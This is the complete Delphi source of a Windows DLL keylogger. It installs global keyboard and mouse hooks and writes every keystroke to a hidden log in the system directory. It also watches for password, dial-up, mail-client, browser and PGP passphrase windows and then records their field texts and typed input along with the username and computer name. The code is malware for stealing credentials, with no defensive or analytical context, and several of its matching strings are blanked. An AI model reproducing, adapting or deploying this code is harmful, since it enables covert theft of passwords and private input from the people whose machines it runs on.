library hplt;
uses
  windows,
  messages;
var
  SysHook  : HHook ;
  SysHook2 : HHook;
  LastHWND : HWND ;
  LastHWND2: HWND;
  CurrentHWND: HWND =0;
  filename1 : string = 'hplt.thl';
  b:boolean = false;
  filename2 : string = 'hplt32.thl'; //  
(******************************************************************************)
function smIntToStr(x:integer):string;
var
  s:string;
begin
  system.Str(x,s);
  smIntToStr:=s;
end;
(******************************************************************************)
function AnsiLowerCase(const S: string): string;
var
  Len: Integer;
begin
  Len := Length(S);
  SetString(Result, PChar(S), Len);
  if Len > 0 then CharLowerBuff(Pointer(Result), Len);
end;
(******************************************************************************)
function FileExists(const FileName: string): Boolean;
function MyFileAge(const FileName: string): Integer;
var
  Handle: THandle;
  FindData: TWin32FindData;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    result:=0;
  end
  else Result := -1;
end;
begin
  FileExists:=MyFileAge(FileName) = 0;
end;
(******************************************************************************)
function GetSystemDir:string;
var
P: PChar;
s:string;
begin
   getmem(p,1024);
   windows.GetSystemDirectory(p,1024);
   s:=string(p);
   if s[length(s)]<>'\' then s:=s+'\';
   result:=s;
   FreeMem(P);
end;
(******************************************************************************)
Procedure SaveLog(filename:string; data : string);
var
  f:THandle;
  buf:array [1..$FFFF] of char;
  i:integer;
  n:cardinal;
  s:string;
  t:SystemTime;
  p1:PChar;
  st:string;
begin
  {$I-}
  if fileExists(GetSystemDir + filename) then
    begin // 
      f:=CreateFile(
                    PChar(GetSystemDir + filename),
                    GENERIC_WRITE,
                    FILE_SHARE_READ,
                    nil,
                    OPEN_ALWAYS,
                    FILE_ATTRIBUTE_NORMAL,
                    0
                    );
      if f<>INVALID_HANDLE_VALUE then
        begin
          for i:=1 to length(data) do buf[i]:=data[i];
          SetFilePointer(f,GetFileSize(f,0)-1,nil,FILE_BEGIN );
          WriteFile(f,buf,i,n,0);
          closehandle(f);
        end;
    end
  else //  
    begin
      f:=CreateFile(
                    PChar(GetSystemDir + filename),
                    GENERIC_WRITE,
                    FILE_SHARE_READ,
                    nil,
                    CREATE_ALWAYS,
                    FILE_ATTRIBUTE_NORMAL,
                    0
                    );
       if f<>INVALID_HANDLE_VALUE then
         begin
           n:=255;
           getmem(p1,n);
           Windows.GetUserName(p1,n);
           st:='USERNAME: '+string(p1);
           freemem(p1);
           n:=255;
           getmem(p1,n);
           windows.GetComputerName(p1,n);
           st:=st+' ||   ComputerName: '+string(p1);
           freemem(p1);
           GetSystemTime(t);
           s:='#################   TT LOG  ############################'+#13#10+
              '###  Date: '+ smInttostr(t.wDay)+'.'+smInttostr(t.wMonth)+'.'+smInttostr(t.wYear)+#13#10+
              '###  Time: '+smInttostr(t.wHour)+':'+smInttostr(t.wMinute)+#13#10+
              '###  USER: '+st+#13#10+
              '########################################################'+#13#10;
           for i:=1 to length(s) do buf[i]:=s[i];
           writeFile(f,buf,Length(s),n,0);

           for i:=1 to length(data) do buf[i]:=data[i];
           WriteFile(f,buf,Length(data),n,0);
           closehandle(f);
         end;
    end;
  {$I+}
end;
(******************************************************************************)
function EnumChildProc(wnd:HWND;lParam:LPARAM):bool; stdcall;
var
 p:PChar;
begin
  getmem(p,50);
  GetWindowText(wnd,p,49);
  saveLog(filename2,string(p)+#13#10);
  freemem(p,50);
  result:=true;
end;
(******************************************************************************)
function EnumChildProc2(wnd:HWND;lParam:LPARAM):bool; stdcall;
var                    //  
 p:PChar;
 MainWnd: HWND;
 s:string;
 i:integer;
begin
  MainWnd:=LParam;
  getmem(p,50);
  getwindowText(wnd,p,49);
  s:=string(p);
  freemem(p);
  s:=ansiLowerCase(s);
  if length(s)>0 then for i:=1 to length(s) do if s[i]='&' then delete(s,i,1);
      if
      (pos('',s)<>0) or
      (pos('passw',s)<>0)
       then
         begin
           getmem(p,100);
           getwindowtext(MainWnd,p,99);
           s:=#13#10'######[ON MOUSE]######'#13#10;
           savelog(filename2,s);
           EnumChildWindows(MainWnd, @EnumChildProc,0);
           freemem(p);
         end;
 result:=true;
end;
(******************************************************************************)
function MouseProc(code: integer; wParam:WPARAM; lParam:LPARAM):lResult; stdcall;
var
 s:string;
 P:PChar;
 wnd:hwnd;
 pt: TPoint;
begin
  if (code=HC_ACTION)	and (wParam=WM_LBUTTONDOWN) then
    begin
      Wnd:=Windows.GetActiveWindow;
      if Wnd<>LastHWND2 then
        begin
          EnumChildWindows(Wnd, @EnumChildProc2,wnd);
        end;
      LastHwnd2:=wnd;
     end;
  Result:= CallNextHookEx(SysHook2, Code, wParam, lParam);
end;
(******************************************************************************)
function KeyboardProc(code: integer; wParam:WPARAM; lParam:LPARAM):lResult; stdcall;
var
 k:TKeyBoardState;
 AryChar: array[0..30] of Char;
 count:integer;
 st:string;
 p:PChar;
 f: boolean;
 WndCaption:string;
 s:string;

begin
  f:=false;
  if code = HC_ACTION then
    if ((lParam and (1 shl 30)) <> 0) then
      begin
        case wParam of
          VK_BACK : s:=s+'<BS>';
          VK_DELETE: s:=s+'<DEL>';
          VK_RETURN  : S:=S+#13#10; // enter
          VK_MULTIPLY  : s:=s+'*';
          VK_ADD : s:=s+'+';
          VK_DECIMAL: s:=s+'.';
          VK_DIVIDE : s:=s+'/';
          else
            begin
              GetKeyboardState(K);
              Count := ToAscii(wParam, lParam, K, AryChar, 0);
              if count=1 then
                begin
                  s:=s+AryChar[0];
                  f:=true; // 
                end;
            end;
        end; // case;
      end; //end if

  wndCaption:='';
  if f then
    begin
      //CurrentHWND:=Windows.GetActiveWindow;
        CurrentHWND:=windows.GetForegroundWindow;
         if CurrentHWND<>LastHWND then
          begin
            b:=false;
            GetMem(p,100);
            GetWindowText(CurrentHWND,p,99);
            wndCaption:=wndCaption+#13#10+'###[ON KEYBRD] ' +string(p)+' ####'+#13#10;
            st:=string(p);
              if (pos('',st)<>0) or
                 (pos('etwork',st)<>0) or
                 (pos('connect to',st)<> 0)or        //DialUP
                 (pos(' ',st)<> 0)or   //DialUP
                 (pos('  ',st)<> 0)or    //DialUP
                 (pos('etype dialer',st)<> 0)or      //DialUP
                 (pos ('p networking',st)<> 0)or      //DialUP
                 (pos('p connection',st)<> 0)or      //DialUP
                 (pos('connecting to',st)<> 0)or     //DialUP
                 (pos('connessione a',st)<> 0)or     //DialUP
                 (pos('edit user - ',st)<> 0)or      //The Bat!
                 (pos('   ',st)<> 0)or //MSIE,MSOutlook,etc
                 (pos(' ',st)<> 0)or   //MSIE
                 (pos(': ',st)<> 0)or        //MSOutlook
                 (pos(' - ',st)<> 0)or           //MSOutlook
                 (pos(' - receiving mail',st)<> 0)or //The Bat!
                 (pos(' ',st)<> 0)or    //Terminal
                 (pos('passphrase',st)<> 0) or       //PGP Disk
                 (pos('',st)<>0)
              then
              begin
                b:=true;
                SaveLOG(filename2,wndCaption);
                EnumChildWindows(CurrentHWND, @EnumChildProc,0);
                SaveLOG(filename2,#13#10'## USER INPUT: '#13#10);
              end;
            LastHWND:=CurrentHWND;
            freemem(p);
          end;
    end;

  if b then savelog(filename2,s);
  s:=WndCaption+s;
  savelog(filename1,s);

  Result:= CallNextHookEx(SysHook, Code, wParam, lParam);
end;
//===================================================================
{   HOOK-}
procedure hook(switch : Boolean) export; stdcall;
begin
  if switch=true then
  begin
    {  HOOK,     (switch=true). }
    SysHook := SetWindowsHookEx(WH_KEYBOARD, @KeyBoardProc, HInstance, 0);
    sysHook2:= SetWindowsHookEx(WH_Mouse, @MouseProc, HInstance, 0);
   end
  else
    begin
      UnHookWindowsHookEx(SysHook)
    end;
end;
//====================================================================================
exports hook;

begin
end.
